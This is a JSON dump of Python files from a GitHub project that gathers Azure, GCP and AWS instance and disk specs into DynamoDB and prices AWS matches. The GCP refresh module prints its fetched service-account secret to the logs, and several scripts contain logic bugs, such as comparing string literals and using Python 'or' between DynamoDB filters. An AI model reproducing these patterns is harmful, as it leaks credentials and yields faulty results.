int(attrs['maxVolumeSize'].split(' ')[0]) * 1024\n refresh_data.append(ebs_data)\n \n return refresh_data\n\ndef lambda_handler(event, context):\n # get ec2 instance information\n data = boto3.client('ec2').describe_instance_types()\n \n instances = data['InstanceTypes']\n \n while \"NextToken\" in data:\n data = boto3.client('ec2').describe_instance_types(NextToken=data[\"NextToken\"])\n instances.extend(data['InstanceTypes'])\n \n # associates name with compute category\n vm_types = {\n 'm':'general purpose', 't':'general purpose', 'a':'general purpose', \n 'c':'compute optimized',\n 'r':'memory optimized', 'u':'memory optimized', 'x':'memory optimized', 'z':'memory optimized',\n 'i':'storage optimized', 'd':'storage optimized','h':'storage optimized',\n 'p':'accelerated computing', 'inf':'accelerated computing', 'g':'accelerated computing', 'f':'accelerated computing' \n }\n \n print(len(instances))\n ec2_specs = []\n for instance in instances:\n # categorize instance\n if instance['InstanceType'][0] == 'i': # this block catches edge case where two different categories of instances start with 'i'\n if instance['InstanceType'][1] == '3':\n type = 'storage optimized'\n else:\n type = 'accelerated computing'\n else:\n type = vm_types[instance['InstanceType'][0]]\n \n # get data ready to be put in DB\n ec2_specs.append(\n {\n 'name': instance['InstanceType'],\n 'resource type' : 'virtual machine',\n 
'virtual machine type' : type,\n 'vCPUs': int(instance['VCpuInfo']['DefaultVCpus']),\n 'MemoryMB': int(int(instance['MemoryInfo']['SizeInMiB']) * 1.049), # conver from Mib to \n 'NetworkInfo': instance['NetworkInfo'],\n 'provider': 'AWS'\n \n }\n )\n \n # put data in DB\n table = boto3.resource('dynamodb').Table('bluewhale_resources')\n for item in ec2_specs:\n table.put_item(Item=item)\n for item in ebs_refresh():\n table.put_item(Item=item)\n \n return {\n 'statusCode': 200,\n 'body': json.dumps('Refresh complete!')\n }\n" }, { "alpha_fraction": 0.6517241597175598, "alphanum_fraction": 0.6735632419586182, "avg_line_length": 35.29166793823242, "blob_id": "c82864ea9d0755c9e788835a962280db2969c2a4", "content_id": "7a93f3fb0b53692bc19905908817283e0368fb06", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 870, "license_type": "no_license", "max_line_length": 166, "num_lines": 24, "path": "/testing+data/closeNumberTest.py", "repo_name": "Caleb-Grode/bluewhale", "src_encoding": "UTF-8", "text": "import time\nstart = time.time()\n\npotential_matches = [{'MemoryMB':2,'name':1},{'MemoryMB':2,'name':2},{'MemoryMB':3,'name':3},{'MemoryMB':10,'name':4},{'MemoryMB':1,'name':5},{'MemoryMB':5,'name':6}]\nvm = {}\nvm['MemoryMB'] = 1\nmatched_instances = []\n\n# we are going to find the 5 closest instances in memory\nfor i in range(0,5):\n # find the closest instance\n closest = min(potential_matches, key=lambda x:abs(x['MemoryMB']-vm['MemoryMB']))\n # add the instance to our final list\n matched_instances.append(closest)\n\n print(closest)\n \n # remove the closest from the potential matches so we can find the next closest\n potential_matches = [i for i in potential_matches if not (i['name'] == closest['name'])]\n\n# we now have a list of the five closest instances by memory\ntime.sleep(0.9)\nend = time.time()\nprint(\"Time consumed in working: \",end - start)" }, { "alpha_fraction": 0.5935798287391663, "alphanum_fraction": 0.5973058342933655, "avg_line_length": 33.50495147705078, "blob_id": "9b465fc15be1da02fc436771030ef75051978144", "content_id": "72dfd93dba5e48085c9b4237f05724f8be491951", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3489, "license_type": "no_license", "max_line_length": 128, "num_lines": 101, "path": "/testing+data/test.py", "repo_name": "Caleb-Grode/bluewhale", "src_encoding": "UTF-8", "text": "import boto3\nfrom boto3.dynamodb.conditions import Key\nfrom boto3.dynamodb.conditions import Attr\nimport time\nstart = time.time()\n\ndynamodb = boto3.resource('dynamodb', endpoint_url=\"https://dynamodb.us-east-1.amazonaws.com\")\n\ntable = dynamodb.Table('bluewhale_resources')\n\n# query for AWS vm\nAWS_vm= table.scan(\n # virtual machine from AWS which has the same type and more or equal vCPUs and similar ram capacity\n FilterExpression= Attr('resource type').eq('virtual machine') \n & Attr('provider').eq('AWS')\n)\n\ndef match_vm(vm,t):\n # get vm specs\n vCPUs = vm['vCPUs']\n memory = vm['MemoryMB']\n type = vm['virtual machine type']\n potential_matches = []\n matched_instances = []\n\n # filter potential matches\n for vm in AWS_vm['Items']:\n if vm['virtual machine type'] == type and 'vCPUs' == vCPUs and 'MemoryMB' >= int(float(memory) - (float(memory)*0.2)):\n potential_matches.append(vm)\n\n # edge case where AWS does not offer large enough instance in terms of vCPUs\n if not potential_matches:\n # if this is the case, we will return the largest possible instance\n 
# get all of the specified type\n data = t.scan(\n FilterExpression= Attr('resource type').eq('virtual machine') \n & Attr('provider').eq('AWS')\n & Attr('virtual machine type').eq(type) \n )\n if not data['Items']:\n return []\n # find the lowest number of vCPUs for potential match\n values = [x['vCPUs'] for x in data['Items']]\n max_vCPUs = max(values)\n\n # add all instances of this largest size to a list\n largest_matches = []\n for instance in data['Items']:\n if instance['vCPUs'] == max_vCPUs:\n largest_matches.append(instance['name'])\n \n return largest_matches\n \n # find the lowest number of vCPUs for potential match\n \n min_vCPUs = min(potential_matches, key=lambda x:x['vCPUs'] == vm['vCPUs'])\n\n # we now have the instances matched by vCPUs now we need to match by memory\n\n\n # we are going to try to find the 5 closest instances in memory\n for i in range(0,5):\n # while we still have options\n if min_vCPUs:\n # find the closest instance\n closest = min(min_vCPUs, key=lambda x:abs(x['MemoryMB']-vm['MemoryMB']))\n # add the instance to our final list\n matched_instances.append(closest['name'])\n \n # remove the closest from the potential matches so we can find the next closest\n potential_matches = [i for i in potential_matches if not (i['name'] == closest['name'])]\n \n # repeat 5x\n\n return matched_instances\n\nprint(\"Getting data...\")\n# get azure and gcp vm data\nthird_party_vm = table.scan(\n FilterExpression= Attr('resource type').eq('virtual machine') & (Attr('provider').eq('Azure') or Attr('provider').eq('GCP'))\n )\n\nprint(\"begin matching...\")\ncounter = 0\n# add in the AWS matches to each vm!\nfor vm in third_party_vm['Items']:\n counter = counter + 1\n print(str(counter) + ' ' + vm['name'])\n\n matches = match_vm(vm,table)\n table.update_item(\n Key={\n 'name': vm['name']\n },\n UpdateExpression=\"set AWS_matches=:a\",\n ExpressionAttributeValues={\n ':a': matches\n },\n ReturnValues=\"UPDATED_NEW\"\n )\nprint(\"done!\")\n\n\n\n\n" }, { "alpha_fraction": 0.5751320123672485, "alphanum_fraction": 0.5904944539070129, "avg_line_length": 36.85454559326172, "blob_id": "8748d7d2a863e1ae7456903d9898e5cc6b19ee32", "content_id": "dbfd873639a5fd65dc61d6b38990e9b028be4bb3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2083, "license_type": "no_license", "max_line_length": 129, "num_lines": 55, "path": "/bluewhale_disk_match.py", "repo_name": "Caleb-Grode/bluewhale", "src_encoding": "UTF-8", "text": "# Author: Caleb Grode\n# Purpose: Matches the 3rd party disk offerings with AWS matches\n# This code will need to be maintaned as the matches are done through a dict\n# we at first wanted to match based off IOPs but the way the different providers list or calculate IOPs differs a lot\n# so the disks are martched by use case\n\nimport json\nimport boto3\nfrom boto3.dynamodb.conditions import Attr\n\ndef lambda_handler(event, context):\n # there are only a few general categories of block storage available so we match the instances\n # with a hard coded dict--the GCP disks calculate IOPs in a very different way than AWS or Azure\n # so I went with a hard coded solution\n # because of this, this code will need to be maintained\n match_map = {\n 'pd-extreme' : ['io1', 'io2'],\n 'pd-ssd' : ['gp2', 'gp3'],\n 'pd-balanced' : ['gp2', 'gp3'],\n 'pd-standard' : ['st1', 'sc1'],\n 'Premium_LRS': ['io1', 'io2','gp2', 'gp3'],\n 'Premium_ZRS': ['io1', 'io2','gp2', 'gp3'],\n 'StandardSSD_LRS' : ['gp2', 'gp3'],\n 'StandardSSD_ZRS' : 
['gp2', 'gp3'],\n 'Standard_LRS' : ['st1', 'sc1'],\n 'UltraSSD_LRS' : ['io1', 'io2']\n }\n \n \n dynamodb = boto3.resource('dynamodb', endpoint_url=\"https://dynamodb.us-east-1.amazonaws.com\")\n\n table = dynamodb.Table('bluewhale_resources')\n \n print(\"Getting data...\")\n # get azure and gcp disk data\n third_party_disk = table.scan(\n FilterExpression= Attr('resource type').eq('virtual disk') & (Attr('provider').eq('Azure') or Attr('provider').eq('GCP'))\n )\n # add the matches into the DB entries!\n for disk in third_party_disk['Items']:\n table.update_item(\n Key={\n 'name': disk['name']\n },\n UpdateExpression=\"set AWS_matches=:a\",\n ExpressionAttributeValues={\n ':a': match_map[disk['name']]\n },\n ReturnValues=\"UPDATED_NEW\"\n )\n print(\"done!\")\n return {\n 'statusCode': 200,\n 'body': json.dumps('Matching complete!')\n }\n\n" }, { "alpha_fraction": 0.5218985080718994, "alphanum_fraction": 0.5309666395187378, "avg_line_length": 36.550724029541016, "blob_id": "faa71b71a0eb233794af03064ffbf9c44541437c", "content_id": "82f1345fc9250176be02b31cd675f2d6818edac4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5183, "license_type": "no_license", "max_line_length": 157, "num_lines": 138, "path": "/bluewhale_calculate_cost.py", "repo_name": "Caleb-Grode/bluewhale", "src_encoding": "UTF-8", "text": "# Author: Caleb Grode\n# Purpose: take in list of AWS resources and calculate the price per month for these resources\n# Inputs: list of dicts containing details about ec2 instances, list of dicts containing details about EBS resources\n# Output: the input dicts with the price per month added into the cost and the total cost per month of all instances\n\nimport json\nimport boto3\n\n\ndef get_ec2_cost(reg, ec2, os, quantity, pc, hours):\n # if this region, ec2 and os combo is not available this code might fail\n # so we will try + catch and return None if there is an issue\n try:\n paginator = pc.get_paginator('get_products')\n\n response_iterator = paginator.paginate(\n ServiceCode=\"AmazonEC2\",\n Filters=[\n {\n 'Type': 'TERM_MATCH',\n 'Field': 'location',\n 'Value': reg\n },\n {\n 'Type': 'TERM_MATCH',\n 'Field': 'instanceType',\n 'Value': ec2\n },\n {\n 'Type': 'TERM_MATCH',\n 'Field': 'capacitystatus',\n 'Value': 'Used'\n },\n {\n 'Type': 'TERM_MATCH',\n 'Field': 'tenancy',\n 'Value': 'Shared'\n },\n {\n 'Type': 'TERM_MATCH',\n 'Field': 'preInstalledSw',\n 'Value': 'NA'\n },\n {\n 'Type': 'TERM_MATCH',\n 'Field': 'operatingSystem',\n 'Value': os\n }\n ],\n PaginationConfig={\n 'PageSize': 100\n }\n )\n\n products = []\n for response in response_iterator:\n for priceItem in response[\"PriceList\"]:\n priceItemJson = json.loads(priceItem)\n products.append(priceItemJson)\n \n # parse out the data we want\n sku = products[0]['product']['sku']\n on_demand_code = sku + '.' 
+ 'JRTCKXETXF'\n price_per_hr_code = '6YS6EN2CT7'\n price_per_hour_usd = products[0]['terms']['OnDemand'][on_demand_code]['priceDimensions'][on_demand_code+'.'+price_per_hr_code]['pricePerUnit']['USD']\n \n \n\n return round(hours * float(price_per_hour_usd) * int(quantity), 2)\n except:\n return 0\n\ndef get_ebs_cost(region, ebs_type, ebs_name, quantity, size_GB, pc):\n\n response = pc.get_products(ServiceCode='AmazonEC2', Filters=[\n {'Type': 'TERM_MATCH', 'Field': 'volumeType', 'Value': ebs_type}, \n {'Type': 'TERM_MATCH', 'Field': 'location', 'Value': region}])\n \n products = []\n for priceItem in response[\"PriceList\"]:\n priceItemJson = json.loads(priceItem)\n products.append(priceItemJson)\n print(priceItemJson)\n \n # parse out the data we want\n price_per_hour_usd = 0 # to prevent return 'None'\n for ebs in products: # this goes through the ebse of type 'ebs_type' and selects the price\n sku = ebs['product']['sku']\n on_demand_code = sku + '.' + 'JRTCKXETXF'\n price_per_hr_code = '6YS6EN2CT7'\n if ebs_name == ebs['product'][\"attributes\"]['volumeApiName']:\n price_per_hour_usd = ebs['terms']['OnDemand'][on_demand_code]['priceDimensions'][on_demand_code+'.'+price_per_hr_code]['pricePerUnit']['USD']\n \n \n \n return round(float(price_per_hour_usd) * int(quantity) * int(size_GB), 2)\n\n\ndef lambda_handler(event, context):\n json_data = json.loads(event['body'])\n #json_data = event\n\n ec2 = json_data['ec2'] # dicts of {'name': name, 'region':region, 'os':os, 'quantity': quantity}\n ebs = json_data['ebs'] # dicts of {'name': name, 'region': region}\n total_cost_per_month = 0\n total_cost_per_month_EC2 = 0\n total_cost_per_month_EBS = 0\n pricing_client = boto3.client('pricing', region_name='us-east-1')\n\n # get cost info for all ec2 instances\n for e in ec2:\n # update individual price\n e['price per month USD'] = get_ec2_cost(e['region'], e['name'], e['os'], e['quantity'], pricing_client, 730)\n # update the total cost\n total_cost_per_month_EC2 += e['price per month USD']\n # get cost info for all ebs volumes\n for x in ebs:\n # update individual price\n x['price per month USD'] = get_ebs_cost(x['region'], x['type'], x['name'], x['quantity'], x['GB'], pricing_client)\n # update the total cost\n total_cost_per_month_EBS += x['price per month USD'] \n \n total_cost_per_month = total_cost_per_month_EBS + total_cost_per_month_EC2\n \n return {\n 'statusCode': 200,\n 'headers' : {\n 'Access-Control-Allow-Origin': '*',\n },\n 'body': json.dumps({\n 'compute costs' : ec2,\n 'storage costs' : ebs,\n 'total EC2 cost per month USD' : total_cost_per_month_EC2,\n 'total EBS cost per month USD' : total_cost_per_month_EBS,\n 'total cost per month USD' : total_cost_per_month\n\n })\n }\n\n" }, { "alpha_fraction": 0.6456953883171082, "alphanum_fraction": 0.6556291580200195, "avg_line_length": 36.875, "blob_id": "f83631ebb1c95617065d16951a508f48021636c3", "content_id": "e42632f85d1d9a6a84e40a091d1e3b11bc1dbc57", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 302, "license_type": "no_license", "max_line_length": 144, "num_lines": 8, "path": "/gcp_refresh_resources/api_gateway_test.py", "repo_name": "Caleb-Grode/bluewhale", "src_encoding": "UTF-8", "text": "import requests\nimport json\n\ndata = requests.get('https://pz9xze9vsl.execute-api.us-east-1.amazonaws.com/prod/virtual-machines/list?provider=Azure&category=general purpose')\nj = json.loads(data.text)\nfor machine in j['Items']:\n print(machine['name'])\n 
print('...................................')" }, { "alpha_fraction": 0.594629168510437, "alphanum_fraction": 0.6035805344581604, "avg_line_length": 26.964284896850586, "blob_id": "e43ad7a3c2cc1e1c839398e91213b7c57b1cc45b", "content_id": "7994cd79ff1defd1fdce9fe2b2cc46133e8c0649", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 782, "license_type": "no_license", "max_line_length": 98, "num_lines": 28, "path": "/bluewhale_disk_provider_list.py", "repo_name": "Caleb-Grode/bluewhale", "src_encoding": "UTF-8", "text": "# Author: Caleb Grode\n# Purpose: Lists the disk options given a provider\n\nimport json\nimport boto3\nfrom boto3.dynamodb.conditions import Attr\n\ndef lambda_handler(event, context):\n # parameters\n provider = event['queryStringParameters']['provider']\n dynamodb = boto3.resource('dynamodb', endpoint_url=\"https://dynamodb.us-east-1.amazonaws.com\")\n\n table = dynamodb.Table('bluewhale_resources')\n \n print(\"Getting data...\")\n # get disk data\n disks = table.scan(\n FilterExpression= Attr('resource type').eq('virtual disk') \n & Attr('provider').eq(provider)\n )\n\n return {\n 'statusCode': 200,\n 'headers' : {\n 'Access-Control-Allow-Origin': '*',\n },\n 'body': json.dumps(disks)\n }" }, { "alpha_fraction": 0.5368931889533997, "alphanum_fraction": 0.5368931889533997, "avg_line_length": 21.77777862548828, "blob_id": "a2b6aafcd7efbcaf9fd05052c8f7f34d656f39ed", "content_id": "495c85e992e106d81de0d342d6122a9b6ede3225", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1030, "license_type": "no_license", "max_line_length": 146, "num_lines": 45, "path": "/testing+data/parseAzureSKU.py", "repo_name": "Caleb-Grode/bluewhale", "src_encoding": "UTF-8", "text": "import json\n\n# parse list-sku azure api calls\n\nwith open('list-skus.json') as json_file:\n data = json.load(json_file)\n\nvm = []\ndisk = []\nfor j in data:\n if j['resourceType'] == 'virtualMachines':\n vm.append(\n j\n )\n elif j['resourceType'] == 'disks':\n disk.append(\n j\n )\n\n\nall_vm_specs = []\nfor v in vm:\n vm_specs = {}\n vm_specs['name'] = v['name']\n for c in v['capabilities']:\n if c['name'] == 'vCPUs' or c['name'] == 'MemoryGB' or c['name'] == 'vCPUsAvailable' or c['name'] == 'ACUs' or c['name'] == 'vCPUsPerCore':\n vm_specs[c['name']] = c['value']\n all_vm_specs.append(vm_specs)\n\nall_disk_specs = []\nfor d in disk:\n disk_specs = {}\n disk_specs['name'] = v['name']\n disk_specs['size'] = v['size']\n for c in d['capabilities']:\n disk_specs[c['name']] = c['value']\n all_disk_specs.append(disk_specs)\n\nfor dict in all_vm_specs:\n print(dict)\n print()\n\n#for dict in all_disk_specs:\n# print(dict)\n# print()\n \n" }, { "alpha_fraction": 0.5766052007675171, "alphanum_fraction": 0.5825386643409729, "avg_line_length": 33.19565200805664, "blob_id": "baade52a5e82588fa54dc6239e307f98e10e13de", "content_id": "71bdefd908d775445f338aca74d0815c741f1465", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4719, "license_type": "no_license", "max_line_length": 178, "num_lines": 138, "path": "/bluewhale_azure_refresh.py", "repo_name": "Caleb-Grode/bluewhale", "src_encoding": "UTF-8", "text": "# Author: Caleb Grode\n# Purpose: This function calls an Azure API to retrieve specs about the different Azure VM & virtual disk offerings. 
\n# It categorizes and selects the desired specs for every returned instance and puts them into the DynamoDB\n# table 'bluewhale_resources'\n\nimport json\nimport requests\nimport adal\nimport boto3\nfrom decimal import Decimal\nimport os\n\n# timeout: 30 seconds (takes about 15)\n# memory: 512MB (uses about 251)\n\ndef lambda_handler(event, context):\n\n # info for azure authentification\n azure_client_id = os.environ['azure_client_id']\n azure_secret = os.environ['azure_secret']\n azure_subscription_id = os.environ['azure_subscription_id']\n azure_tenant = os.environ['azure_tenant']\n authority_url = 'https://login.microsoftonline.com/' + azure_tenant\n resource = 'https://management.azure.com/'\n \n # for API request\n context = adal.AuthenticationContext(authority_url)\n token = context.acquire_token_with_client_credentials(resource, azure_client_id, azure_secret)\n \n # API request header\n headers = {'Authorization': 'Bearer ' + token['accessToken'], 'Content-Type': 'application/json'}\n \n # API params and url\n params = {'api-version': '019-04-01'}\n url = 'https://management.azure.com/subscriptions/'+azure_subscription_id+'/providers/Microsoft.Compute/skus'\n \n \n print(\"calling API\")\n azure_SKUs_JSON = requests.get(url, headers=headers, params=params)\n print(\"API called!\")\n azure_SKUs_JSON = azure_SKUs_JSON.json()\n\n \n # now we have our Azure data\n # begin parsing\n \n vm = []\n disk = []\n for j in azure_SKUs_JSON['value']:\n # grab all VMs\n if j['resourceType'] == 'virtualMachines':\n vm.append(\n j\n )\n # grab all disks\n elif j['resourceType'] == 'disks':\n disk.append(\n j\n )\n \n # associates the first letter of a vm size with its (AWS equivalent) compute category\n vm_types = {\n 'D':'general purpose', 'A':'general purpose', 'B':'general purpose', \n 'F':'compute optimized','H':'compute optimized',\n 'E':'memory optimized', 'M':'memory optimized', 'G':'memory optimized',\n 'L':'storage optimized',\n 'N':'accelerated computing',\n 'P':'unknown edge case' \n }\n \n # parse out the specifications of the VMs\n all_vm_specs = []\n name_dict = {}\n for v in vm: \n vm_specs = {}\n vm_specs['name'] = v['name']\n vm_specs['virtual machine type'] = vm_types[v['size'][0]] # categorize the vm type based off above dictionary\n for c in v['capabilities']:\n if c['name'] == 'vCPUs' or c['name'] == 'MemoryGB' or c['name'] == 'ACUs' or c['name'] == 'vCPUsPerCore' or c['name'] == 'MaxResourceVolumeMB' or c['name'] == 'GPUs':\n \n if c['name'] == 'MemoryGB':\n vm_specs['MemoryMB'] = int(Decimal(c['value'])*1000) # convert to MB for better matching\n if c['name'] == 'vCPUs' or c['name'] == 'vCPUsPerCore':\n vm_specs[c['name']] = int(c['value'])\n else:\n vm_specs[c['name']] = c['value']\n name_dict[v['name']] = vm_specs\n\n \n\n\n # add in data columns\n for key,value in name_dict.items(): \n value['resource type'] = 'virtual machine'\n value['provider'] = 'Azure'\n all_vm_specs.append(value)\n \n \n # parse out the specifications of the disks\n name_dict.clear()\n all_disk_specs = []\n for d in disk:\n disk_specs = {}\n disk_specs['name'] = d['name']\n disk_specs['size'] = d['size']\n for c in d['capabilities']:\n disk_specs[c['name']] = c['value']\n name_dict[d['name']] = disk_specs\n \n for ky,val in name_dict.items():\n val['resource type'] = 'virtual disk'\n val['provider'] = 'Azure'\n all_disk_specs.append(val)\n\n # now we have the data we want!\n\n\n print('Number of VMs: ' + str(len(all_vm_specs)))\n print('Number of disks: ' + str(len(all_disk_specs)))\n\n\n 
print(\"Inputing VMs into DB...\")\n # put the data into the database\n azure_vm_table = boto3.resource('dynamodb').Table('bluewhale_resources')\n for item in all_vm_specs:\n azure_vm_table.put_item(Item=item)\n print(\"Done!\")\n \n print(\"Inputing disks into DB...\")\n azure_disk_table = boto3.resource('dynamodb').Table('bluewhale_resources')\n for item in all_disk_specs:\n azure_disk_table.put_item(Item=item)\n print(\"Done!\")\n \n return {\n 'statusCode': 200,\n 'body': json.dumps('Refresh complete!')\n }\n" }, { "alpha_fraction": 0.5076673030853271, "alphanum_fraction": 0.515566885471344, "avg_line_length": 32.31007766723633, "blob_id": "c851bbe8478b6596063d82f50321a8ae3eb0a151", "content_id": "734ea1bb943db6c3e109b35227ef29f91a5c939d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4304, "license_type": "no_license", "max_line_length": 157, "num_lines": 129, "path": "/bluewhale_get_vm_AWS_match.py", "repo_name": "Caleb-Grode/bluewhale", "src_encoding": "UTF-8", "text": "# Author: Caleb Grode\n# Input: Third party vm name, AWS region name, operating system\n# Output: AWS EC2 match(s) with price in desired region\n# Purpose: On the front end the customer will select a vm from gcp or azure and the backend will need to \n# return the available EC2 matches as well as their price in the desired region\n# This code was heavily inspired by this blog: https://www.sentiatechblog.com/using-the-ec2-price-list-api\nimport json\nimport boto3\nfrom boto3.dynamodb.conditions import Key\n\ndef get_price_info(reg, ec2, os, pc):\n # if this region, ec2 and os combo is not available this code might fail\n # so we will try + catch and return None if there is an issue\n try:\n paginator = pc.get_paginator('get_products')\n\n response_iterator = paginator.paginate(\n ServiceCode=\"AmazonEC2\",\n Filters=[\n {\n 'Type': 'TERM_MATCH',\n 'Field': 'location',\n 'Value': reg\n },\n {\n 'Type': 'TERM_MATCH',\n 'Field': 'instanceType',\n 'Value': ec2\n },\n {\n 'Type': 'TERM_MATCH',\n 'Field': 'capacitystatus',\n 'Value': 'Used'\n },\n {\n 'Type': 'TERM_MATCH',\n 'Field': 'tenancy',\n 'Value': 'Shared'\n },\n {\n 'Type': 'TERM_MATCH',\n 'Field': 'preInstalledSw',\n 'Value': 'NA'\n },\n {\n 'Type': 'TERM_MATCH',\n 'Field': 'operatingSystem',\n 'Value': os\n }\n ],\n PaginationConfig={\n 'PageSize': 100\n }\n )\n\n products = []\n for response in response_iterator:\n for priceItem in response[\"PriceList\"]:\n priceItemJson = json.loads(priceItem)\n products.append(priceItemJson)\n \n # parse out the data we want\n sku = products[0]['product']['sku']\n on_demand_code = sku + '.' 
+ 'JRTCKXETXF'\n price_per_hr_code = '6YS6EN2CT7'\n price_per_hour_usd = products[0]['terms']['OnDemand'][on_demand_code]['priceDimensions'][on_demand_code+'.'+price_per_hr_code]['pricePerUnit']['USD']\n instance_meta_data = products[0]['product']['attributes']\n \n # build a dict of the data we want\n data = {\n 'name' : ec2,\n 'price per hour USD' : price_per_hour_usd,\n 'instance meta data' : instance_meta_data\n }\n\n return data\n except:\n return None\n\n\n\ndef lambda_handler(event, context):\n # parameters\n vm_name = event['queryStringParameters']['vm-to-match']\n region = event['queryStringParameters']['region']\n operating_system = event['queryStringParameters']['os']\n matches = []\n match_data = []\n\n dynamodb = boto3.resource('dynamodb', endpoint_url=\"https://dynamodb.us-east-1.amazonaws.com\")\n\n table = dynamodb.Table('bluewhale_resources')\n\n # query for potential matches\n data = table.query(\n # virtual machine from AWS which has the same type and more or equal vCPUs and similar ram capacity\n KeyConditionExpression= Key('name').eq(vm_name)\n )\n\n print(data['Items'][0])\n matches = data['Items'][0]['AWS_matches']\n\n pricing_client = boto3.client('pricing', region_name='us-east-1')\n\n\n \n\n for ec2 in matches:\n price_info = get_price_info(region, ec2, operating_system, pricing_client)\n if price_info != None:\n match_data.append(price_info)\n\n if not match_data:\n print(\"Region or OS not availiable for current selection\")\n return {\n 'statusCode': 500,\n 'headers' : {\n 'Access-Control-Allow-Origin': '*',\n },\n 'body': json.dumps(\"Invalid region + os selection\")\n }\n else:\n return {\n 'statusCode': 200,\n 'headers' : {\n 'Access-Control-Allow-Origin': '*',\n },\n 'body': json.dumps(match_data)\n }\n\n\n\n\n\n\n\n" }, { "alpha_fraction": 0.6315377354621887, "alphanum_fraction": 0.6358472108840942, "avg_line_length": 39.84000015258789, "blob_id": "6d4b0923de85376a3a4ac3d7757547b273cf11e0", "content_id": "7f612eae4f5cd438f16cecbe119a7a0aa15bd647", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5105, "license_type": "no_license", "max_line_length": 108, "num_lines": 125, "path": "/gcp_refresh_resources/bluewhale_gcp_refresh.py", "repo_name": "Caleb-Grode/bluewhale", "src_encoding": "UTF-8", "text": "# Author: Caleb Grode\n# Purpose: Refresh the databse with GCP vm & Disk offerings\n\nimport json\nimport boto3\nimport os\nfrom googleapiclient import discovery\nfrom oauth2client.client import GoogleCredentials\nimport base64\nfrom botocore.exceptions import ClientError\n\n\ndef get_secret():\n secret_name = \"bluewhale_gcp_app_creds\"\n region_name = \"us-east-1\"\n\n # Create a Secrets Manager client\n session = boto3.session.Session()\n client = session.client(\n service_name='secretsmanager',\n region_name=region_name\n )\n\n # In this sample we only handle the specific exceptions for the 'GetSecretValue' API.\n # See https://docs.aws.amazon.com/secretsmanager/latest/apireference/API_GetSecretValue.html\n # We rethrow the exception by default.\n\n try:\n get_secret_value_response = client.get_secret_value(\n SecretId=secret_name\n )\n except ClientError as e:\n if e.response['Error']['Code'] == 'DecryptionFailureException':\n # Secrets Manager can't decrypt the protected secret text using the provided KMS key.\n # Deal with the exception here, and/or rethrow at your discretion.\n raise e\n elif e.response['Error']['Code'] == 'InternalServiceErrorException':\n # An error occurred on the server 
side.\n # Deal with the exception here, and/or rethrow at your discretion.\n raise e\n elif e.response['Error']['Code'] == 'InvalidParameterException':\n # You provided an invalid value for a parameter.\n # Deal with the exception here, and/or rethrow at your discretion.\n raise e\n elif e.response['Error']['Code'] == 'InvalidRequestException':\n # You provided a parameter value that is not valid for the current state of the resource.\n # Deal with the exception here, and/or rethrow at your discretion.\n raise e\n elif e.response['Error']['Code'] == 'ResourceNotFoundException':\n # We can't find the resource that you asked for.\n # Deal with the exception here, and/or rethrow at your discretion.\n raise e\n else:\n # Decrypts secret using the associated KMS CMK.\n # Depending on whether the secret is a string or binary, one of these fields will be populated.\n if 'SecretString' in get_secret_value_response:\n secret = get_secret_value_response['SecretString']\n return secret\n else:\n decoded_binary_secret = base64.b64decode(get_secret_value_response['SecretBinary'])\n return decoded_binary_secret\n\nprint(get_secret())\nsecret = json.loads(get_secret())\n\nwith open('/tmp/cred.json', 'w') as json_file:\n json.dump(secret, json_file)\n\nos.environ['GOOGLE_APPLICATION_CREDENTIALS']='/tmp/cred.json'\n\ndef lambda_handler(event, context):\n # we want the information about the virtual machines that GCP offers\n # their API gives us info by GCP zone\n # to get all vm info we thus need to look through all zones\n zones = []\n credentials = GoogleCredentials.get_application_default()\n\n service = discovery.build('compute', 'v1', credentials=credentials)\n # Project ID for this request.\n project = 'learned-iris-320618'\n request = service.zones().list(project=project)\n while request is not None:\n response = request.execute()\n\n for zone in response['items']:\n # TODO: Change code below to process each `zone` resource:\n zones.append(zone['name'])\n\n request = service.zones().list_next(previous_request=request, previous_response=response)\n machines = {}\n\n # associates the first letter of a machine with its (AWS equivalent) compute category\n vm_types = {\n 'e':'general purpose', 'n':'general purpose', 'f':'general purpose', 'g':'general purpose',\n 'c':'compute optimized',\n 'm':'memory optimized',\n 'a':'accelerated computing' \n }\n\n\n # get machine for each zones\n for zone in zones:\n request = service.machineTypes().list(project=project, zone=zone)\n while request is not None:\n response = request.execute()\n # get each machines details\n for machine_type in response['items']:\n machines[machine_type['name']] = {\n 'name' : machine_type['name'],\n 'vCPUs' : machine_type['guestCpus'],\n 'MemoryMB' : machine_type['memoryMb'],\n 'virtual machine type' : vm_types[machine_type['name'][0]],\n 'provider': 'GCP',\n 'resource type': 'virtual machine'\n }\n request = service.machineTypes().list_next(previous_request=request, previous_response=response)\n # now we have a list of all the machines!\n resource_table = boto3.resource('dynamodb').Table('bluewhale_resources')\n # put machines into the DB\n for k in machines.keys():\n resource_table.put_item(Item=machines[k])\n return {\n 'statusCode': 200,\n 'body': json.dumps('Refresh complete!')\n }\n" }, { "alpha_fraction": 0.5962199568748474, "alphanum_fraction": 0.6048110127449036, "avg_line_length": 30.45945930480957, "blob_id": "a1716cf6f744433a72180afbff4e2fb03553bb18", "content_id": "c51942800f2b98bc989d34d36099d5c2b176e172", 
